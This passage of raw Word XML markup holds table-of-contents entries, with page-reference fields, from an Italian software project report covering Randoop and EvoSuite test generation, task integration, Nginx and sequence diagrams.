            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195726 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F35C0A5" w14:textId="6F470CEE" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195727" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.6.1 Play</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195727 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C2C32E2" w14:textId="795314EB" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195728" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.6.2 Generazione Test Randoop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195728 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76A90A19" w14:textId="277C2BFA" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195729" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.6.3 Generazione Test EvoSuite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195729 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DF566FA" w14:textId="32793B60" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195730" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.7 Glossario dei termini</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195730 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A7C7570" w14:textId="21C26A8C" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195731" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3 Integrazione</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195731 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73B223C0" w14:textId="1A1076E0" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195732" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Modifiche apportate ai Task</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195732 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14126354" w14:textId="0568E578" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195733" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.1 Task 6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195733 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20795A9E" w14:textId="0E56E751" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195734" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.2 Task 7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195734 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A9635B7" w14:textId="6A012715" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195735" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.3 Task 8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195735 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F9790EA" w14:textId="024957EB" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195736" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.4 Task 9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195736 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="149F15E9" w14:textId="7232E6BA" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195737" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.5 Nginx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195737 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36184843" w14:textId="618EBA80" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195738" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Diagrammi di Sequenza</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195738 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C990A28" w14:textId="77FDCE5E" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195739" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1 Play</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195739 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="762775DF" w14:textId="3EA117C3" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195740" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2 Generazione Test Randoop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195740 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62E1E7F1" w14:textId="79CE322F" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195741" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3 Generazione Test EvoSuite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195741 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F8BF32D" w14:textId="15F9202B" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195742" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Diagramma di Attività</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195742 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06FCCB09" w14:textId="56021EA6" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
